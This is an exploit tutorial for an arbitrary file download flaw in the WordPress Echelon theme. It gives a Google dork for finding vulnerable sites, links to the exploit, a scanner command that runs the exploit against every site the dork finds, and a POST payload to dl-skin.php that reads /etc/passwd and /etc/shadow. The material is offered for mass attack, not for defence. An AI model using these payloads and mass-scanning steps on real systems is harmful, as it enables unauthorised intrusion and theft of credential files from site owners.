TUTORIAL ::: E X P L O I T
$MASS_EXPLOIT = ($Script_Exploit + $SCANNER_INURLBR);
--------------------------------------------------------------------------------------------------------------
# NAME:::::::: Wordpress A.F.D Theme Echelon# TIPE:::::::: Arbitrary File Download
# Google DORK: inurl:/wp-content/themes/echelon
# Vendor:::::: www.wordpress.org
# Tested on::: Linux
# EXECUTE::::: php exploit.php www.alvo.com.br
# OUTPUT:::::: EXPLOIT_WPAFD_Echelon.txt
--------------------------------------------------------------------------------------------------------------
EXPLOIT:::
DOWNLOAD::
LINK[0]::: http://pastebin.com/14uVQyUV
LINK[1]::: http://packetstormsecurity.com/files/129607/WordPress-A.F.D.-Theme-Echelon-Arbitrary-File-Download.html
--------------------------------------------------------------------------------------------------------------
USE::::::: MASS / USE SCANNER INURLBR
DOWNLOAD::
LINK[0]::: https://github.com/googleinurl/SCANNER-INURLBR
--------------------------------------------------------------------------------------------------------------
COMAND EXEC SCANNER INURLBR / comando de uso....
./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s save.txt --command-all "php exploit.php _TARGET_"
--------------------------------------------------------------------------------------------------------------
Arquivos que o EXPLOIT verifica::
File download /etc/passwd & /etc/shadow
Failure consists of exploring a parameter $ _POST file
{alvo_target}/wp-content/themes/echelon/lib/scripts/dl-skin.php
The following fields are exploited for Arbitrary File Download
*REQUEST POST:*
_mysite_download_skin={$config['file']}&submit=Download
ex:
_mysite_download_skin=/etc/passwd&submit=Download
[Vídeo]
#-------------------------------------------------------------------
# AUTOR: GoogleINURL
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# GIT: https://github.com/googleinurl
# YOUTUBE: https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
#-------------------------------------------------------------------